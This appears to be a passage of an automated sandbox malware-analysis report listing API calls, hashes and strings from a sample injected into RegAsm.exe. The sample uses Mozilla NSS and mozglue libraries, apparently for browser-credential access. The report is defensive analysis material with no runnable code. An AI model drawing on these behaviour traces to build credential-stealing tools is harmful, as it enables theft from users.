                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                    • String ID:
                                                                                    • API String ID: 1909280232-0
                                                                                    • Opcode ID: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                                    • Instruction ID: 8e26460293ed9733fbf94ea2a8bb779337280dd7279f523cafbead84053ff015
                                                                                    • Opcode Fuzzy Hash: 8bdb2f17d1480f0a23a472939e79ef36dbf13ce619ee201eeef7b995d0d3dcb9
                                                                                    • Instruction Fuzzy Hash: 6E61EE76A017409FDB118F29C880BDEBBB4BF89308F45851CED8A57711EB30E959CB91
                                                                                    APIs
                                                                                      • Part of subcall function 6CDBC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CDBDAE2,?), ref: 6CDBC6C2
                                                                                    • PR_Now.NSS3 ref: 6CDBCD35
                                                                                      • Part of subcall function 6CE19DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CE60A27), ref: 6CE19DC6
                                                                                      • Part of subcall function 6CE19DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CE60A27), ref: 6CE19DD1
                                                                                      • Part of subcall function 6CE19DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CE19DED
                                                                                      • Part of subcall function 6CDA6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CD51C6F,00000000,00000004,?,?), ref: 6CDA6C3F
                                                                                    • PR_GetCurrentThread.NSS3 ref: 6CDBCD54
                                                                                      • Part of subcall function 6CE19BF0: TlsGetValue.KERNEL32(?,?,?,6CE60A75), ref: 6CE19C07
                                                                                      • Part of subcall function 6CDA7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CD51CCC,00000000,00000000,?,?), ref: 6CDA729F
                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CDBCD9B
                                                                                    • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CDBCE0B
                                                                                    • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CDBCE2C
                                                                                      • Part of subcall function 6CDB10C0: TlsGetValue.KERNEL32(?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB10F3
                                                                                      • Part of subcall function 6CDB10C0: EnterCriticalSection.KERNEL32(?,?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB110C
                                                                                      • Part of subcall function 6CDB10C0: PL_ArenaAllocate.NSS3(?,?,?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB1141
                                                                                      • Part of subcall function 6CDB10C0: PR_Unlock.NSS3(?,?,?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB1182
                                                                                      • Part of subcall function 6CDB10C0: TlsGetValue.KERNEL32(?,6CD58802,00000000,00000008,?,6CD4EF74,00000000), ref: 6CDB119C
                                                                                    • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CDBCE40
                                                                                      • Part of subcall function 6CDB14C0: TlsGetValue.KERNEL32 ref: 6CDB14E0
                                                                                      • Part of subcall function 6CDB14C0: EnterCriticalSection.KERNEL32 ref: 6CDB14F5
                                                                                      • Part of subcall function 6CDB14C0: PR_Unlock.NSS3 ref: 6CDB150D
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaMark_Util.NSS3(?,6CDBCD93,?), ref: 6CDBCEEE
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CDBCD93,?), ref: 6CDBCEFC
                                                                                      • Part of subcall function 6CDBCEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CDBCD93,?), ref: 6CDBCF0B
                                                                                      • Part of subcall function 6CDBCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CDBCD93,?), ref: 6CDBCF1D
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CDBCD93,?), ref: 6CDBCF47
                                                                                      • Part of subcall function 6CDBCEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CDBCD93,?), ref: 6CDBCF67
                                                                                      • Part of subcall function 6CDBCEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CDBCD93,?,?,?,?,?,?,?,?,?,?,?,6CDBCD93,?), ref: 6CDBCF78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                    • String ID:
                                                                                    • API String ID: 3748922049-0
                                                                                    • Opcode ID: b95a14950a9f094994b7a8dcabe8ee6b24cd0413b1b28d40f305e23c51d3d49c
                                                                                    • Instruction ID: d09e5b196be59db1ad86a8db5f32c604c35291aebc3cb37bef7493526841d4e6
                                                                                    • Opcode Fuzzy Hash: b95a14950a9f094994b7a8dcabe8ee6b24cd0413b1b28d40f305e23c51d3d49c
                                                                                    • Instruction Fuzzy Hash: 065180F6A00105DBE710DF69DC40BAA77F4BF88348F250524E956A7B60EB31E915CBA1
                                                                                    APIs
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC89FDB
                                                                                    • free.MOZGLUE(?,?), ref: 6CC89FF0
                                                                                    • free.MOZGLUE(?,?), ref: 6CC8A006
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6CC8A0BE
                                                                                    • free.MOZGLUE(?,?), ref: 6CC8A0D5
                                                                                    • free.MOZGLUE(?,?), ref: 6CC8A0EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    • Opcode ID: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                                    • Instruction ID: 9c19301ef556c554c1055d4111ec05caa02896369e989cbeecb3336dbf044415
                                                                                    • Opcode Fuzzy Hash: 8df95bf3468f4dcb70a5b93bb41ba8a01abbb89e792dcfe39741a4f872a2951c
                                                                                    • Instruction Fuzzy Hash: C261A0759096019FC711CF18C48055AB7F5FFC8328F548669E89A9B702EB32E996CBC1
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8DC60
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,6CC8D38A,?), ref: 6CC8DC6F
                                                                                    • free.MOZGLUE(?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCC1
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CC8D38A,?), ref: 6CC8DCE9
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CC8D38A,?), ref: 6CC8DD05
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CC8D38A,?), ref: 6CC8DD4A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                    • String ID:
                                                                                    • API String ID: 1842996449-0
                                                                                    • Opcode ID: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                                    • Instruction ID: f95ab5b4610a31dd541f95dcbf7d8d8831b510fef9ec918727a68d02dc9b95bd
                                                                                    • Opcode Fuzzy Hash: 302164b4bdc4204a8f5fbefc04d345935966b577cbc528d8b63c052ead2e8c54
                                                                                    • Instruction Fuzzy Hash: 01416DB5A01606CFCB40CF99C88099BBBF5FF89318B65456AE945A7B11E771FC10CB90
                                                                                    APIs
                                                                                    • __lock.LIBCMT ref: 0041AC05
                                                                                      • Part of subcall function 004195E3: __mtinitlocknum.LIBCMT ref: 004195F9
                                                                                      • Part of subcall function 004195E3: __amsg_exit.LIBCMT ref: 00419605
                                                                                      • Part of subcall function 004195E3: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142,?,?,0041824B,00000000,0042C9A0,00418292,?), ref: 0041960D
                                                                                    • DecodePointer.KERNEL32(0042C928,00000020,0041AD48,00000000,00000001,00000000,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D), ref: 0041AC41
                                                                                    • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC52
                                                                                      • Part of subcall function 0041A1CA: EncodePointer.KERNEL32(00000000,0041DD9C,00640400,00000314,00000000,?,?,?,?,?,0041AF5F,00640400,Microsoft Visual C++ Runtime Library,00012010), ref: 0041A1CC
                                                                                    • DecodePointer.KERNEL32(-00000004,?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC78
                                                                                    • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC8B
                                                                                    • DecodePointer.KERNEL32(?,0041AD6A,000000FF,?,0041960A,00000011,00000000,?,0041A251,0000000D,?,?,0041A6A5,00419142), ref: 0041AC95
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                                    • String ID:
                                                                                    • API String ID: 2005412495-0
                                                                                    • Opcode ID: 5eae9ba92db9f391da7a98d96cbf24dd8e8b58c23c54e94460fead475b42f367
                                                                                    • Instruction ID: 82b28b59af7dd3c184eeb9877d32a4703ccad0faabb5854936e7eb60fed2b48d
                                                                                    • Opcode Fuzzy Hash: 5eae9ba92db9f391da7a98d96cbf24dd8e8b58c23c54e94460fead475b42f367
                                                                                    • Instruction Fuzzy Hash: 2A31597090131ADFDF009FA9D9446EDBAB2BB08314F10402BE510A6251EBBC48E1DF9A
                                                                                    APIs
                                                                                      • Part of subcall function 6CC6FA80: GetCurrentThreadId.KERNEL32 ref: 6CC6FA8D
                                                                                      • Part of subcall function 6CC6FA80: AcquireSRWLockExclusive.KERNEL32(6CCBF448), ref: 6CC6FA99
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC76727
                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6CC767C8
                                                                                      • Part of subcall function 6CC84290: memcpy.VCRUNTIME140(?,?,6CC92003,6CC90AD9,?,6CC90AD9,00000000,?,6CC90AD9,?,00000004,?,6CC91A62,?,6CC92003,?), ref: 6CC842C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                    • String ID: data
                                                                                    • API String ID: 511789754-2918445923
                                                                                    • Opcode ID: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                                    • Instruction ID: 4c7fee14074932d8afbb4927f9e725613be66797e8b279bba5f0a1475bae2ffc
                                                                                    • Opcode Fuzzy Hash: 868b79dfd72263b26f106d93265602dabf269a79dfc1c2bf0422cd05cb11deb2
                                                                                    • Instruction Fuzzy Hash: F2D1BD75A087408FD724CF65C851B9BBBE5EFC5348F10892DE48997B91FB30A849CB62
                                                                                    APIs
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6CC8C82D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6CC8C842
                                                                                      • Part of subcall function 6CC8CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6CCAB5EB,00000000), ref: 6CC8CB12
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6CC8C863
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6CC8C875
                                                                                      • Part of subcall function 6CC6B13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6CCAB636,?), ref: 6CC6B143
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6CC8C89A
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC8C8BC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2745304114-0
                                                                                    • Opcode ID: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                                    • Instruction ID: d6efabef8bd65adb6721dbe20feece3e57f601e32d838ee83afd082c42a582f2
                                                                                    • Opcode Fuzzy Hash: ad86ec264a5a47fda1b31331219832c27f8e8dad6352cba228b64b06a68c3f5c
                                                                                    • Instruction Fuzzy Hash: E911B275B002099FCB00DFF5D9D98AFBB78EF89358B000169E60697341EB34A909CBA5
                                                                                    APIs
                                                                                    • __getptd.LIBCMT ref: 004199DC
                                                                                      • Part of subcall function 0041A334: __getptd_noexit.LIBCMT ref: 0041A337
                                                                                      • Part of subcall function 0041A334: __amsg_exit.LIBCMT ref: 0041A344
                                                                                    • __amsg_exit.LIBCMT ref: 004199FC
                                                                                    • __lock.LIBCMT ref: 00419A0C
                                                                                    • InterlockedDecrement.KERNEL32(?), ref: 00419A29
                                                                                    • _free.LIBCMT ref: 00419A3C
                                                                                    • InterlockedIncrement.KERNEL32(0042E1C0), ref: 00419A54
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                    • String ID:
                                                                                    • API String ID: 3470314060-0
                                                                                    • Opcode ID: b773e6d552ccfad440dbe85945124e7c8c2f4aeb4d937a5b8b473a23aea6016f
                                                                                    • Instruction ID: caf00a63a47d2107667ce069341bde755350c13116bb31bb8cabb81d752e3d13
                                                                                    • Opcode Fuzzy Hash: b773e6d552ccfad440dbe85945124e7c8c2f4aeb4d937a5b8b473a23aea6016f
                                                                                    • Instruction Fuzzy Hash: 4301A131A01652BBDB21AB6694297DE7760AF00764F48411BF800A7691D73C5DC6CBDD
                                                                                    APIs
                                                                                    • StrStrA.SHLWAPI(?,00000104,00000001,00000000,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EC5
                                                                                    • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EDE
                                                                                    • lstrlenA.KERNEL32(00000104,?,00411A64,?,00000000,?,?,00000104,?,00000104,?,?,00000000), ref: 00410EF0
                                                                                    • wsprintfA.USER32 ref: 00410F02
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                    • String ID: %s%s$C:\Users\user\Desktop\
                                                                                    • API String ID: 1206339513-93594680
                                                                                    • Opcode ID: b1cf3b79bae8205c5e98a6104eb4aec33707c09f6793000b5dfa10ead055c7da
                                                                                    • Instruction ID: ce7f7404f388939de60972bac1840d25f072318a1a03b2d91798bb9a882066e1
                                                                                    • Opcode Fuzzy Hash: b1cf3b79bae8205c5e98a6104eb4aec33707c09f6793000b5dfa10ead055c7da
                                                                                    • Instruction Fuzzy Hash: F7F089326002297FDB011F59AC48E9BBFAEEF5A765F044036FD0893211C7725D118BE5
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6CC3EB57,?,?,?,?,?,?,?,?,?), ref: 6CC6D652
                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D660
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6CC3EB57,?), ref: 6CC6D673
                                                                                    • free.MOZGLUE(?), ref: 6CC6D888
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                    • String ID: |Enabled
                                                                                    • API String ID: 4142949111-2633303760
                                                                                    • Opcode ID: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                                    • Instruction ID: d2b9d6e82247c08b8cd15cf5a8286e2bed2ad11bdee209f9620e142a0e38bca8
                                                                                    • Opcode Fuzzy Hash: 5769ecde866987215c214312e5b3e8740b2931b25560c7db08aaaf9a0546d1f5
                                                                                    • Instruction Fuzzy Hash: F8A118B4A003158FDB11CF6AC5D07AEBBF1AF49318F24845CD889ABB41E735E945CBA1
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 004063B6
                                                                                    • memcmp.MSVCRT ref: 004063DC
                                                                                    • memset.MSVCRT ref: 0040640B
                                                                                    • LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                                      • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                    • String ID: v10
                                                                                    • API String ID: 2733184300-1337588462
                                                                                    • Opcode ID: b3dbac36ee52dd66e9498f1f3aa10f75fd351b9d8fe0f59f2cbfbbe816d508af
                                                                                    • Instruction ID: 826216ebd120f836410502ef39e66991b541041ee5f5c3879761d56bb48995ad
                                                                                    • Opcode Fuzzy Hash: b3dbac36ee52dd66e9498f1f3aa10f75fd351b9d8fe0f59f2cbfbbe816d508af
                                                                                    • Instruction Fuzzy Hash: 39314D71D00219ABCB10DF95DC82AEEBB78EF04354F11813FE916B62C0D7B89A19CA58
                                                                                    APIs
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6CC6F480
                                                                                      • Part of subcall function 6CC3F100: LoadLibraryW.KERNEL32(shell32,?,6CCAD020), ref: 6CC3F122
                                                                                      • Part of subcall function 6CC3F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6CC3F132
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6CC6F555
                                                                                      • Part of subcall function 6CC414B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6CC41248,6CC41248,?), ref: 6CC414C9
                                                                                      • Part of subcall function 6CC414B0: memcpy.VCRUNTIME140(?,6CC41248,00000000,?,6CC41248,?), ref: 6CC414EF
                                                                                      • Part of subcall function 6CC3EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6CC3EEE3
                                                                                    • CreateFileW.KERNEL32 ref: 6CC6F4FD
                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6CC6F523
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                    • String ID: \oleacc.dll
                                                                                    • API String ID: 2595878907-3839883404
                                                                                    • Opcode ID: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                                    • Instruction ID: bf251850898c74005623de6b00750e3827e99eb0af08c6eede5676e93464d8a8
                                                                                    • Opcode Fuzzy Hash: 8db3ade2e76c7dc684c618afdf0cd0c96942311eb06c539bcc35637ec44ddafe
                                                                                    • Instruction Fuzzy Hash: 4D41AE306087509FE720DF6AD984B9AB7F4AF44318F504A1CF59483A50FB30D9498BA2
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7E047
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7E04F
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E09C
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC7E0B0
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6CC7E057
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                    • API String ID: 1832963901-4276087706
                                                                                    • Opcode ID: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                                    • Instruction ID: 4cc4da9b46a90729d47ce00b5c7ea4e919039f75f84e0613efacdd09bfa4aab1
                                                                                    • Opcode Fuzzy Hash: 58b5ac3eae2e30694661e5a8e7a6306bf5a6c5b3be46caf3ccc8d26de38ca540
                                                                                    • Instruction Fuzzy Hash: F421C275B001088FDF10DFA4D85CAEEB7B5EF45208F144029E90A97741EB31A90AC7F1
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(00000000), ref: 6CC97526
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC97566
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC97597
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Init_thread_footer$ErrorLast
